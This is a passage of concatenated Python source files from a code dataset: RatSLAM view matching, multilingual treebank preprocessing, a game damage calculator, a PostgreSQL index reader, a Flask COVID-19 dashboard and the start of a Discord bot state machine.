np.pi:\n self.vt_relative_rad = self.vt_relative_rad - 2.0 * np.pi\n\n vt_err = mindiff/ TEMPLATE_SIZE\n vt_match_id = min_template\n self.vt_error = vt_err\n else:\n for vt in self.templates:\n if( abs( self.current_mean - vt.mean ) > VT_MATCH_THRESHOLD + epsilon ):\n continue\n # VT_SHIFT_MATCH is the range (in pixel units) of horizontal offsets over which the current\n # image is compared to all learnt image templates\n for offset in range( 0, VT_SHIFT_MATCH * 2 - 1, VT_STEP_MATCH ):\n cdiff = 0\n columnAux = 0\n while columnAux < TEMPLATE_SIZE - 2 * VT_SHIFT_MATCH:\n cdiff += np.sum( np.abs( self.current_view[ columnAux + VT_SHIFT_MATCH : columnAux + TEMPLATE_X_SIZE - VT_SHIFT_MATCH ]\n - vt.data[ columnAux + offset : columnAux + TEMPLATE_X_SIZE - 2 * VT_SHIFT_MATCH + offset ] ) )\n columnAux += TEMPLATE_X_SIZE\n if cdiff < mindiff:\n mindiff = cdiff\n min_template = vt.id\n min_offset = 0\n\n self.vt_relative_rad = min_offset / TEMPLATE_X_SIZE * 2.0 * np.pi\n vt_err = mindiff / ( TEMPLATE_SIZE - 2 * VT_SHIFT_MATCH * TEMPLATE_Y_SIZE )\n vt_match_id = min_template\n self.vt_error = vt_err\n\n return vt_err, vt_match_id\n\n \n\n def save(self, prefix):\n '''\n Purpose: This routine saves all the visual templates stored in the collection.\n\n Algorithm: Create a file and store first the id, then the mean and the\n data of visual template.\n\n Inputs: -\n\n Outputs: -\n '''\n with open( str(prefix) +'/localviewcells.txt', 'w') as file:\n file.writelines(str(TEMPLATE_Y_SIZE*TEMPLATE_X_SIZE)+'\\n')\n for i in range(self.templates.size):\n vt = self.templates[i]\n file.writelines(str(vt.id) + '\\n')\n file.writelines(str(vt.mean) + '\\n')\n np.savetxt(file, vt.data, newline=\" \")\n file.writelines('\\n')\n file.writelines(\"-\\n\")\n 
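# (added note) the \"-\" line is a sentinel separating the per-template\n # records from the trailing current_vt/prev_vt values; load() below\n # reads records until it encounters it.\n 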
file.writelines(str(self.current_vt) + '\\n')\n file.writelines(str(self.prev_vt) + '\\n')\n\n def load(self, prefix):\n '''\n Purpose: This routine loads all the visual templates saved and add them\n to the collection.\n\n Algorithm: Open a file with all the visual template stored and for each\n visual template, create a new VisualTemplate object and store it in the\n collection.\n\n Inputs: -\n\n Outputs: -\n '''\n \n with open( str(prefix) +'/localviewcells.txt', 'r') as file:\n tam = int(file.readline())\n line = file.readline()\n while line != \"-\\n\":\n id = float(line)\n line = file.readline()\n mean = float(line)\n line = file.readline()\n datastr = np.array(line.split(\" \"))\n data = np.array([])\n for it in datastr:\n if it != '\\n':\n it = float(it)\n data = np.append(data, np.array(it))\n line = file.readline()\n self.current_view = data\n self.current_mean = mean\n self.__create_template__()\n line = file.readline()\n self.current_vt = float(line)\n line = file.readline()\n self.prev_vt = float(line)\n \n #MAURO -> FUNCAO DE MERGE DOS TEMPLATES\n \n def merge(self, templates, vt_size):\n \n for vt in templates:\n \n # print 'id do novo template: ' + str(vt.id + vt_size)\n\n newcell = VisualTemplate(vt.id + vt_size, # template id\n vt.data,\n vt.mean )\n\n # Add newcell to the collection\n self.templates = np.append(self.templates, newcell)\n\n \n def __call__(self, img, grayscale):\n self.on_image( img, grayscale )\n return self.current_vt, self.vt_relative_rad\n\n","sub_path":"ratslam/local_view_match.py","file_name":"local_view_match.py","file_ext":"py","file_size_in_byte":20634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"37558185","text":"import nltk\nfrom nltk.tree import Tree\nfrom functools import reduce\nfrom nltk import tree, treetransforms\nfrom copy import deepcopy\nfrom collections import deque\nimport queue\nimport argparse\nimport pickle\nimport os\nfrom datetime import datetime\n# from utils import build_vocab,precess_arc\nDATA_DIR='../Data/Treebank/pred_spmrl'\nLanguages=['Basque','French','German','Hebrew','Hungarian','Korean','Polish','swedish']\n#Germany have many very long labels\n#Hebrew and Swedish do not have train, only train5k\n#Hebrew have morphology in word label and phrase label\n\n\n# def finding_right_most_sibling(tree, binary_format=True):\n# \tif not binary_format:\n# \t\tprint(\"so far we only have for the binary format\")\n# \tassert binary_format == True\n# \tindex_list = []\n# \tfor i in range(len(tree.leaves())):\n# \t\tleaf_pos = tree.leaf_treeposition(i)\n# \t\tnon_zero_list = [j for j in range(len(leaf_pos)) if leaf_pos[j] != 0]\n# \t\tif len(non_zero_list) == 0:\n# \t\t\tindex_list.append([[i, len(tree.leaves()) - 1], tree[0].label()])\n# \t\telif non_zero_list[-1] == len(leaf_pos) - 2:\n# \t\t\tzero_list = [k for k in range(len(leaf_pos)) if leaf_pos[k] == 0]\n# \t\t\tsubtree = tree[leaf_pos[:zero_list[-2] + 1]]\n# \t\t\tif '|' in subtree.label():\n# \t\t\t\tindex_list.append([[i, i], 'DUMMY_NODE_LABEL'])\n# \t\t\telse:\n# \t\t\t\tindex_list.append([[i, i], subtree.label()])\n#\n# \t\telse:\n# \t\t\tsubtree = tree[leaf_pos[:non_zero_list[-1] + 1]]\n# \t\t\tif '|' in subtree.label():\n# \t\t\t\tindex_list.append([[i, i + len(subtree.leaves()) - 1], 'DUMMY_NODE_LABEL'])\n# \t\t\telse:\n# \t\t\t\tindex_list.append([[i, i + len(subtree.leaves()) - 1], subtree.label()])\n# \t# subtree.pretty_print()\n# \treturn index_list\n\n\ndef finding_biggest_phrase_sibling(tree, 
binary_format=True):\n\tif not binary_format:\n\t\tprint(\"so far we only have for the binary format\")\n\tassert binary_format == True\n\tindex_list = []\n\tfor i in range(len(tree.leaves())):\n\t\tleaf_pos = tree.leaf_treeposition(i)\n\t\tnon_zero_list = [j for j in range(len(leaf_pos)) if leaf_pos[j] != 0]\n\t\t# last_child_list=[len(tree[leaf_pos[:j]])-1 for j in range(len(leaf_pos))]\n\t\t# non_last_child_list=[j for j in range(len(leaf_pos)) if leaf_pos[j] != last_child_list[j]]\n\t\tif len(non_zero_list) == 0:\n\t\t\tindex_list.append([[i, len(tree.leaves()) - 1], precess_arc(tree[0].label())])\n\t\telse:\n\t\t\tsubtree_pos = leaf_pos[:non_zero_list[-1] + 1]\n\t\t\tsubtree = tree[subtree_pos]\n\t\t\tif len(subtree) > 1:\n\t\t\t\tif '|' in subtree.label():\n\t\t\t\t\tindex_list.append([[i, i + len(subtree.leaves()) - 1], 'DUMMY_NODE_LABEL'])\n\t\t\t\telse:\n\t\t\t\t\tindex_list.append([[i, i + len(subtree.leaves()) - 1], precess_arc(subtree.label())])\n\t\t\telse:\n\t\t\t\tlast_child_subtree_list = [len(tree[subtree_pos[:j]]) - 1 for j in range(len(subtree_pos))]\n\t\t\t\tnon_last_child_subtree = [j for j in range(len(subtree_pos)) if\n\t\t\t\t subtree_pos[j] != last_child_subtree_list[j]]\n\t\t\t\tif len(non_last_child_subtree) == 0:\n\t\t\t\t\tindex_list.append([[i, 0], precess_arc(tree[0].label())])\n\t\t\t\telse:\n\t\t\t\t\tsubtree = tree[subtree_pos[:non_last_child_subtree[-1] + 1]]\n\t\t\t\t\tif '|' in subtree.label():\n\t\t\t\t\t\tindex_list.append([[i, i - len(subtree.leaves()) + 1], 'DUMMY_NODE_LABEL'])\n\t\t\t\t\telse:\n\t\t\t\t\t\tindex_list.append([[i, i - len(subtree.leaves()) + 1], precess_arc(subtree.label())])\n\t# subtree.pretty_print()\n\treturn index_list\n\ndef finding_special_splitting_point(tree, binary_format=True, padding_item=-1):\n\tindex_list = finding_biggest_phrase_sibling(tree, binary_format)\n\tspecial_list = [padding_item] * len(index_list)\n\tfor i in range(len(index_list) - 1):\n\t\tif index_list[i][0][1] == index_list[i+1][0][1]:\n\t\t\tspecial_list[i] = i\n\t\telif index_list[index_list[i+1][0][1]][0][1] == i:\n\t\t\tspecial_list[i] = i\n\t\telif index_list[index_list[i][0][1]][0][1] == i+1:\n\t\t\tspecial_list[i] = i\n\t\telse:\n\t\t\tspecial_list[i] = padding_item\n\treturn special_list\n\nclass timeit():\n\n\tdef __enter__(self):\n\t\tself.tic = self.datetime.now()\n\n\tdef __exit__(self, *args, **kwargs):\n\t\tprint('runtime: {}'.format(self.datetime.now() - self.tic))\n\ndef prepare_data(language):\n\t# assert map_method in ['right_most', 'biggest_phrase'],'We do not support that map method here'\n\tassert language in Languages,\"We do not support ['Basque','French','German','Hebrew','Hungarian','Korean','Polish','swedish'] here\"\n\tlanguage_path=os.path.join(DATA_DIR,language)\n\tif not os.path.exists(os.path.join(language_path,'predtrain')):\n\t\ttrain_path=os.path.join(language_path,'predtrain5k')\n\telse:\n\t\ttrain_path = os.path.join(language_path, 'predtrain')\n\tdev_path=os.path.join(language_path, 'preddev')\n\ttest_path=os.path.join(language_path, 'predtest')\n\tprint(train_path)\n\tprint(dev_path)\n\tprint(test_path)\n\tprint(\"Convert data to binary tree\")\n\tprint(\"Here we use chomsky normal by splitting on right\")\n\twith open(train_path) as f:\n\t\ttrain_raw=f.readlines()\n\t\ttrain_raw=[x.strip() for x in train_raw]\n\twith open(dev_path) as f:\n\t\tdev_raw=f.readlines()\n\t\tdev_raw=[x.strip() for x in dev_raw]\n\twith open(test_path) as f:\n\t\ttest_raw=f.readlines()\n\t\ttest_raw=[x.strip() for x in 
test_raw]\n\tcheck=datetime.now()\n\ttrain_data = []\n\tfor i in range(len(train_raw)):\n\t\tsent = train_raw[i]\n\t\tsent_tree = nltk.Tree.fromstring(sent)\n\t\tsent_tree.collapse_unary(sent_tree, joinChar=\"====\")\n\t\tsent_tree.chomsky_normal_form()\n\t\tsent_pos = [sent_tree[sent_tree.leaf_treeposition(j)[:-1]] for j in range(len(sent_tree.leaves()))]\n\t\tsent_pos = [' '.join(str(x).split()) for x in sent_pos]\n\t\tsent_word_label = ['DUMMY_WORD_LABEL'] * len(sent_tree.leaves())\n\t\tfor j in range(len(sent_tree.leaves())):\n\t\t\tif len(sent_tree.leaf_treeposition(j)) > 2:\n\t\t\t\tif len(sent_tree[sent_tree.leaf_treeposition(j)[:-2]]) == 1:\n\t\t\t\t\tsent_word_label[j] = sent_tree[sent_tree.leaf_treeposition(j)[:-2]].label()\n\t\t# sent_tree.pretty_print()\n\t\tsent_output = finding_biggest_phrase_sibling(sent_tree)\n\t\tsent_special_point = finding_special_splitting_point(sent_tree)\n\t\tsent_word_label = [precess_arc(x) for x in sent_word_label]\n\t\ttrain_data.append([sent_pos, sent_output, sent_word_label, sent_special_point])\n\tdev_data = []\n\tfor i in range(len(dev_raw)):\n\t\tsent = dev_raw[i]\n\t\tsent_tree = nltk.Tree.fromstring(sent)\n\t\tsent_tree.collapse_unary(sent_tree, joinChar=\"====\")\n\t\tsent_tree.chomsky_normal_form()\n\t\tsent_pos = [sent_tree[sent_tree.leaf_treeposition(j)[:-1]] for j in range(len(sent_tree.leaves()))]\n\t\tsent_pos = [' '.join(str(x).split()) for x in sent_pos]\n\t\tsent_word_label = ['DUMMY_WORD_LABEL'] * len(sent_tree.leaves())\n\t\tfor j in range(len(sent_tree.leaves())):\n\t\t\tif len(sent_tree.leaf_treeposition(j)) > 2:\n\t\t\t\tif len(sent_tree[sent_tree.leaf_treeposition(j)[:-2]]) == 1:\n\t\t\t\t\tsent_word_label[j] = sent_tree[sent_tree.leaf_treeposition(j)[:-2]].label()\n\t\t# sent_tree.pretty_print()\n\t\tsent_output = finding_biggest_phrase_sibling(sent_tree)\n\t\tsent_special_point = finding_special_splitting_point(sent_tree)\n\t\tsent_word_label = [precess_arc(x) for x in sent_word_label]\n\t\tdev_data.append([sent_pos, sent_output, sent_word_label, sent_special_point])\n\ttest_data = []\n\tfor i in range(len(test_raw)):\n\t\tsent = test_raw[i]\n\t\tsent_tree = nltk.Tree.fromstring(sent)\n\t\tsent_tree.collapse_unary(sent_tree, joinChar=\"====\")\n\t\tsent_tree.chomsky_normal_form()\n\t\tsent_pos = [sent_tree[sent_tree.leaf_treeposition(j)[:-1]] for j in range(len(sent_tree.leaves()))]\n\t\tsent_pos = [' '.join(str(x).split()) for x in sent_pos]\n\t\tsent_word_label = ['DUMMY_WORD_LABEL'] * len(sent_tree.leaves())\n\t\tfor j in range(len(sent_tree.leaves())):\n\t\t\tif len(sent_tree.leaf_treeposition(j)) > 2:\n\t\t\t\tif len(sent_tree[sent_tree.leaf_treeposition(j)[:-2]]) == 1:\n\t\t\t\t\tsent_word_label[j] = sent_tree[sent_tree.leaf_treeposition(j)[:-2]].label()\n\t\t# sent_tree.pretty_print()\n\t\tsent_output = finding_biggest_phrase_sibling(sent_tree)\n\t\tsent_special_point = finding_special_splitting_point(sent_tree)\n\t\tsent_word_label=[precess_arc(x) for x in sent_word_label]\n\t\ttest_data.append([sent_pos, sent_output, sent_word_label, sent_special_point])\n\tprint(datetime.now() - check)\n\treturn train_data, dev_data, test_data\n\ndef precess_arc(label):\n\tlabels = label.split('====')\n\tnew_arc = []\n\tfor l in labels:\n\t\tif l == 'ADVP':\n\t\t\tl = 'PRT'\n\t\t# if len(new_arc) > 0 and l == new_arc[-1]:\n\t\t# continue\n\t\tnew_arc.append(l)\n\tlabel = '===='.join(new_arc)\n\treturn label\n\n#%%\n\n\n#%% md\n\n\n#%%\ndef convert_data(data_raw, vocab_dict):\n\tindices_data = {'sents': [], 'tags': [], 'pointing': 
[], 'labels': [], 'word_labels': [],'special_splitting':[],'sent_char':[],'tag_char':[]}\n\ttag_vocabulary=vocab_dict['tag_vocab']\n\tword_vocabulary = vocab_dict['word_vocab']\n\tlabel_vocabulary = vocab_dict['phrase_label_vocab']\n\tword_label_vocabulary = vocab_dict['word_label_vocab']\n\tchar_word_vocabulary = vocab_dict['char_word_vocab']\n\tchar_tag_vocabulary=vocab_dict['char_tag_vocab']\n\tfor x in data_raw:\n\t\ttags_words = x[0]\n\t\ttags = []\n\t\twords = []\n\t\tchar_sent = []\n\t\tchar_tags = []\n\t\tfor string in tags_words:\n\t\t\ttag, word = string.replace('(', '').replace(')', '').split(' ')\n\t\t\t# if not (word in ['','']):\n\t\t\t# \tchar_word = [char.lower() for char in word]\n\t\t\t# \tchar_word.insert(0,\"\")\n\t\t\t# else:\n\t\t\t# \tchar_word=[word]\n\t\t\t# \tchar_word.insert(0, \"\")\n\t\t\t# if not (tag in ['','','DUMMY_NODE_LABEL','DUMMY_WORD_LABEL']):\n\t\t\t# \tchar_tag = [char.lower() for char in tag]\n\t\t\t# \tchar_tag.insert(0, \"\")\n\t\t\t# \tchar_tag.append(\"\")\n\t\t\t# else:\n\t\t\t# \tchar_tag=[tag]\n\t\t\t# \tchar_tag.insert(0, \"\")\n\t\t\t# \tchar_tag.append(\"\")\n\t\t\ttags.append(tag)\n\t\t\twords.append(word)\n\t\t\t# char_sent.append(char_word)\n\t\t\t# char_tags.append(char_tag)\n\t\t# t = tag_vocabulary.convert2idx(tags)\n\t\t# s = word_vocabulary.convert2idx(words)\n\t\t# t_char = [char_tag_vocabulary.convert2idx(tags_split) for tags_split in char_tags]\n\t\t# s_char = [char_word_vocabulary.convert2idx(words_split) for words_split in char_sent]\n\t\tindices_data['sents'].append(words)\n\t\tindices_data['tags'].append(tags)\n\t\tphrases_labels = x[1]\n\t\tindices_data['pointing'].append([string[0][1] for string in phrases_labels])\n\t\tindices_data['labels'].append(label_vocabulary.convert2idx([string[1] for string in phrases_labels]))\n\t\tword_labels = x[2]\n\t\t# indices_data['sent_char'].append(s_char)\n\t\t# indices_data['tag_char'].append(t_char)\n\t\tindices_data['word_labels'].append(word_label_vocabulary.convert2idx([string for string in word_labels]))\n\t\tindices_data['special_splitting'].append(x[3])\n\tassert (len(indices_data['pointing']) == len(indices_data['labels'])) and (\n\t\t\tlen(indices_data['pointing']) == len(indices_data['sents'])) and (\n\t\t\tlen(indices_data['pointing']) == len(indices_data['tags'])) and (\n\t\t\tlen(indices_data['pointing']) == len(indices_data['special_splitting']))\n\treturn indices_data\n# transform_train=convert_data(train_data)\n# transform_dev=convert_data(dev_data)\n# transform_test=convert_data(test_data)\n#\n# #%%\n#\n# print([transform_test[key][0] for key in transform_test])\n# print(word_vocabulary.convert2word(transform_test['sents'][0]))\n# print(tag_vocabulary.convert2word(transform_test['tags'][0]))\n# print(label_vocabulary.convert2word(transform_test['labels'][0]))\n# print(word_label_vocabulary.convert2word(transform_test['word_labels'][0]))\n\n\n","sub_path":"preprocess_data_spmrl_transformer_predpos.py","file_name":"preprocess_data_spmrl_transformer_predpos.py","file_ext":"py","file_size_in_byte":11179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"389881827","text":"LIMIT_BREAK_LEVEL = 110\n\nINFO_STRING = \"\"\"[{}] {}\n(Co-op mode)\n\nWithout Latents:\nBase: {}\nSubattr: {}\nTotal: {}\n\nWith Latents:\nBase: {}\nSubattr: {}\nTotal: {}\n\"\"\"\n\n\nclass ButtonInfo:\n def get_info(self, dgcog, monster_model):\n\n \"\"\"\n Usage: ^buttoninfo Vajrayasaka\n\n Shows (main, sub, main+sub)damage x (with | without) atk++ 
latents\n\n Optional arguments include:\n\n [coop|solo], default coop\n e.g:\n\n button dmg: 7668\n with subattr: 9968.4\n just subattr: whatever\n\n button dmg with atklatent: 8454.51\n with subattr: 10990.863\n just subattr: whatever\n \"\"\"\n max_level = LIMIT_BREAK_LEVEL if monster_model.limit_mult != 0 else monster_model.level\n max_atk_latents = monster_model.latent_slots / 2\n\n sub_attr_multiplier = self._get_sub_attr_multiplier(monster_model)\n\n result = ButtonInfoResult()\n result.main_damage = self._calculate_damage(dgcog, monster_model, max_level, 0)\n result.sub_damage = result.main_damage * sub_attr_multiplier\n result.total_damage = result.main_damage + result.sub_damage\n\n result.main_damage_with_atk_latent = self._calculate_damage(dgcog, monster_model, max_level, max_atk_latents)\n result.sub_damage_with_atk_latent = result.main_damage_with_atk_latent * sub_attr_multiplier\n result.total_damage_with_atk_latent = result.main_damage_with_atk_latent + result.sub_damage_with_atk_latent\n return result\n\n def _calculate_damage(self, dgcog, monster_model, level, num_atkpp_latent=0):\n stat_latents = dgcog.MonsterStatModifierInput(num_atkpp=num_atkpp_latent)\n stat_latents.num_atk_awakening = len([x for x in monster_model.awakenings if x.awoken_skill_id == 1])\n\n dmg = dgcog.monster_stats.stat(monster_model, 'atk', level, stat_latents=stat_latents)\n num_mult_boost = len([x for x in monster_model.awakenings if x.awoken_skill_id == 30])\n\n dmg *= 1.5 ** num_mult_boost\n return dmg\n\n def _get_sub_attr_multiplier(self, monster_model):\n if monster_model.attr2.value == 6 or monster_model.attr1.value == 6:\n return 0\n if monster_model.attr2.value == monster_model.attr1.value:\n return 1 / 10\n return 1 / 3\n\n def to_string(self, monster, info):\n return INFO_STRING.format(monster.monster_id, monster.name_en, info.main_damage, info.sub_damage,\n info.total_damage,\n info.main_damage_with_atk_latent, info.sub_damage_with_atk_latent,\n info.total_damage_with_atk_latent)\n\n\nclass ButtonInfoResult:\n main_damage: float\n total_damage: float\n sub_damage: float\n main_damage_with_atk_latent: float\n total_damage_with_atk_latent: float\n sub_damage_with_atk_latent: float\n\n\nbutton_info = ButtonInfo()\n","sub_path":"padinfo/button_info.py","file_name":"button_info.py","file_ext":"py","file_size_in_byte":2909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"181819067","text":"from itertools import groupby\n\nfrom werkzeug.exceptions import NotFound\n\nfrom schema_watcher.utils.data_getters import EntityDataStrategy\nfrom schema_watcher.utils.data_types import DataTypes\n\n\nclass IndexesDataStrategy(EntityDataStrategy):\n __names_type__ = DataTypes.indexes_names\n __object_type__ = DataTypes.index\n\n _query = '''\n SELECT ix.relname, a.attname, i.indisunique\nFROM pg_index i\nJOIN pg_attribute a ON a.attrelid = i.indrelid\n AND a.attnum = ANY(i.indkey)\nJOIN pg_class ix ON ix.oid = i.indexrelid\nJOIN pg_namespace n ON n.oid = ix.relnamespace and n.nspname = 'public'\n '''\n\n def _load_names(self, **kwargs):\n return [row[0] for row in self._getter.engine.execute('''\n SELECT ix.relname\nFROM pg_index i\nJOIN pg_class ix ON ix.oid = i.indexrelid\nJOIN pg_namespace n ON n.oid = ix.relnamespace and n.nspname = 'public'\n ''')]\n\n def _load_entity(self, entity_name, **kwargs):\n result = self._getter.engine.execute(self._query + 'and ix.relname=\\'{0}\\''.format(entity_name)).fetchall()\n if result:\n resp = {'name': 
result[0][0], 'columns': [], 'is_unique': result[0][2]}\n for row in result:\n resp['columns'].append(row[1])\n return resp\n else:\n raise NotFound('index %s not found')\n\n def _load_entities(self, **kwargs):\n result = []\n for index_key, index_cols in groupby(self._getter.engine.execute(self._query + ' order by ix.relname'),\n key=lambda row: (row[0], row[2])):\n index_name, index_is_unique = index_key\n ind_result = {'name': index_name, 'columns': [], 'is_unique': index_is_unique}\n for ind_col in index_cols:\n ind_result['columns'].append(ind_col[1])\n result.append(ind_result)\n return result\n","sub_path":"schema_watcher/utils/data_getters/indexes.py","file_name":"indexes.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"380136147","text":"#!/usr/bin/env python\nimport os\nfrom flask import Flask, session, render_template\nfrom flask import request\nimport requests\nimport json\nimport subprocess\nfrom termcolor import colored\n\nfrom punisher import publish\n\napplication = Flask(__name__)\napplication.secret_key = os.urandom(25)\n\n#data={}\n#innerHTML = \"\"\ndict_innerHTML = {}\ndict_state = {}\n\ndropdown = \"\"\noptionlist = \"\"\n \nformatteddropdown = \"\"\n\n\n@application.route('/rawpost', methods=['POST'])\ndef covidDataUpdate():\n print(colored('inside covidDataUpdate', 'green', 'on_red'))\n print(type(request))\n print(type(request.form))\n print(type(request.form['raw']))\n print(request.form['raw'])\n raw=request.form['raw']\n session_data = session.get('data')\n print(\"----------------from rawpost-session_data------------------\")\n print(session_data)\n if bool(raw) :\n \n print(colored(request, 'red', 'on_white')) # should display 'bar'\n\n print(\"raw post....\")\n #response = requests.get(\"https://api.covid19india.org/data.json\")\n print(\"Hello world!\")\n #print(response.json())\n #data = raw\n #data = json.loads(raw)\n #print(\"type of data\",type(data))\n #session['data'] = raw\n session['rawpost'] = {'statewise':raw[\"statewise\"]}\n session['data'] = {'statewise':raw[\"statewise\"]}\n print(raw)\n \n return json.dumps({'errors': \"errors\"})\n\n@application.route('/raw', methods=['GET'])\ndef getcovidDataUpdate():\n print(colored('inside get>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>','green', 'on_grey'))\n print(type(request))\n print(type(request.args.get('raw')))\n #print(type(request.form[0]))\n print(request.args.get('raw'))\n print(json.dumps(request.args.get('raw')))\n raw=json.dumps(request.args.get('raw'))\n print(colored(raw, 'red', 'on_white')) # should display 'bar'\n\n print(\"hello called....\")\n #response = requests.get(\"https://api.covid19india.org/data.json\")\n print(\"Hello world!\")\n #print(response.json())\n data = raw\n\n cords = data[\"statewise\"]\n print(cords)\n print(cords[0][\"state\"])\n\n for covid in data['statewise']:\n covidkeys = covid.keys()\n innerHTML=\"\"\n for key in covidkeys:\n innerHTMLobj = \"{labels:}: {values:}\"\n formattedinnerHTMLobj = innerHTMLobj.format(labels=key, values=covid[key])\n #print(formattedinnerHTMLobj)\n innerHTML += formattedinnerHTMLobj\n #print(innerHTML)\n dict_innerHTML[covid['statecode']] = innerHTML\n dict_state[covid['statecode']] = covid[\"state\"]\n #print(innerHTML)\n global optionlist\n for keys in dict_state:\n print(dict_state[keys])\n optionlistobj=\"\"\n formattedoptionlistobj = optionlistobj.format(key=keys, value=dict_state[keys])\n optionlist += formattedoptionlistobj\n \n 
formatteddropdown = dropdown.format(options=optionlist)\n print(colored('==========================new[]record===========================', 'green', 'on_red'))\n print(raw)\n \n return json.dumps({'errors': \"errors\"})\n\n\n\ndata={}\nsession_data={}\n@application.route('/state', methods=['GET'])\ndef covidstate():\n print(\"Inside covidstate-------\")\n print(\"----------------------------------------\")\n print(session.get('rawpost'))\n print(\"----------------------------------------\")\n print(session.get('data'))\n print(\"----------------------------------------\")\n obj = session.get('rawpost')\n if bool(obj) :\n print(\"----------------rawpost----------------\")\n print(session.get('rawpost'))\n session_data = session.get('rawpost')\n print(\"--------session_data_loaded_from_session------------------\")\n print(session_data)\n data = session_data['statewise']\n print(json.dumps(data))\n else :\n print(\"----------------data----------------\")\n print(session.get('data'))\n session_data = session.get('data')\n #cords = data\n #print(data[0][\"state\"])\n dict_statewise={}\n if bool(session_data) :\n print(\"------------------session_data--------------------\")\n print(session_data)\n for covid in session_data['statewise']:\n covidkeys = covid.keys()\n innerHTML=\"\"\n for key in covidkeys:\n innerHTMLobj = \"{labels:}: {values:}\"\n formattedinnerHTMLobj = innerHTMLobj.format(labels=key, values=covid[key])\n #print(formattedinnerHTMLobj)\n innerHTML += formattedinnerHTMLobj\n #print(innerHTML)\n #dict_innerHTML[covid[\"statecode\"]] = innerHTML\n dict_statewise[covid['statecode']] = covid\n print(\"-----------------------from dict_statewise--------------------------\")\n print(covid['statecode'])\n print(covid)\n print(dict_statewise[covid['statecode']])\n print(\"--------------------------------------------------------------------\")\n #dict_state[covid[\"statecode\"]] = covid[\"state\"]\n #print(innerHTML)\n\n #print(innerHTML)\n stateOption=request.args.get('stateOption')\n statecode = stateOption\n print(statecode)\n \n return render_template('statewise.html', heading=\"statewise\", state=dict_statewise[statecode])\n\n\n #return formattedhtml_snippet\n\n\n\n@application.route('/')\ndef covid():\n print(\"hello called....\")\n response = requests.get(\"https://api.covid19india.org/data.json\")\n print(\"Hello world!\")\n #print(response.json())\n data = response.json()\n session['data'] = {'statewise':data[\"statewise\"]}\n cords = data[\"statewise\"]\n #print(cords)\n print(cords[0][\"state\"])\n covids={}\n dict_statewise={}\n for covid in data['statewise']:\n covids = covid\n covidkeys = covid.keys()\n innerHTML=\"\"\n dict_innerHTML[covid[\"statecode\"]] = innerHTML\n dict_statewise[covid[\"statecode\"]] = covid\n dict_state[covid[\"statecode\"]] = covid[\"state\"]\n #print(innerHTML)\n global optionlist\n for keys in dict_state:\n #print(dict_state[keys])\n optionlistobj=\"\"\n formattedoptionlistobj = optionlistobj.format(key=keys, value=dict_state[keys])\n optionlist += formattedoptionlistobj\n \n formatteddropdown = dropdown.format(options=optionlist)\n\n #html_snippet = \"HTML in 10 Simple Steps or Less\"\n #html_snippet = \"\"\n html_snippet=\"covid results {heading:}
{select:} Select state {innerHTMLS:}\"\n\n    formattedhtml_snippet = html_snippet.format(heading=\"statewise\", select=formatteddropdown ,innerHTMLS=dict_innerHTML[\"TT\"])\n\n    #print(html_snippet)\n\n    #html_snippet=\"\"+innerHTML+\"covid results\"\n    out = subprocess.Popen(['python', 'punisher.py', 'start'], \n                stdout=subprocess.PIPE, \n                stderr=subprocess.STDOUT)\n\n    #stdout,stderr = out.communicate()\n    #print(stdout)\n    #print(stderr)\n    return render_template('dashboard.html', heading=\"statewise\", data=session.get('data'), state=dict_statewise['TT'], select=formatteddropdown ,innerHTMLS=dict_innerHTML[\"TT\"])\n    #return formattedhtml_snippet\n\n\n\nif __name__ == '__main__':\n    application.run()\n","sub_path":"wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":7753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"240840281","text":"#anyway, state table is a dict, where each item is a state, with id, function to run when entering a state, with array of parameters - useful, for example, for \"add role\" function. most important is a list of state transitions, each one includes a type (like on_message) which is an actual function, a function that returns a number, an array of parameters to give that function (or the parent \"type\" function) and an array of states you go to according to these values. \n#we also have ticks every hour, so we can set things to do when tick count is mod that number. tick count is per yak!\n\n#for each type, we have an array for each state table. the array includes the states which care about that type. when running and the event occurs, if it is an on_tick event (not triggered by a user, i can imagine there are others) we see which states care about the event. then, for each state, we extract all the yaks in that state AND which do not say \"exclude me\". then, we call the function, FOR THAT USER, with the parameters and go to where the result sends us.\n#if it is an event triggered by a user (like a message), we can simply check in db that he is not 'frozen' and run the function in the state table, according to his state (taken from db), if relevant\n\nfrom discord_shepherd import *\n\n\n\n#here be functions used in the above state table. note they are called by predefined functions, like \"on_message\"\n#all are async because some are async and no way of knowing which is which. but they can probably all run in parallel, any order\nasync def null_func(x,y,z): #always two parameters and then array. that is my format\n    return 0\n    \nasync def reminder(yak,y,x):\n    await send_dm(yak,y,[\"reminder: \"+x[0]]) # 3rd parameter is always an array\n    return 0\n\nasync def has_role(yak,y,x):\n    #print(\"has role:\",yak,x)\n    if x[0] in yak['roles']:\n        return 1\n    return 0\n\nasync def kick_out(yak,y,x):\n    print(\"kick out id with message (sent by dm):\",yak['discordid'],x[0])\n    return 0\n\nasync def send_dm(yak,y,x):\n    print(\"here i send a DM to the current yak we are looking at, with text:\",yak['discordid'],x[0])\n    print(\"client:\", client, client.get_user, client.get_user(yak['discordid']))\n    target=client.get_user(yak['discordid']).dm_channel\n    if (not target): \n        print(\"need to create dm channel\",flush=True)\n        target=await client.get_user(yak['discordid']).create_dm()\n    print(\"target is:\",target,flush=True) \n    #await target.send(x[0])# do not want to actually send yet\n    return 0\n\nasync def posted_introduction(yak,m,x):\n    print('check if this message is in introduction channel. 
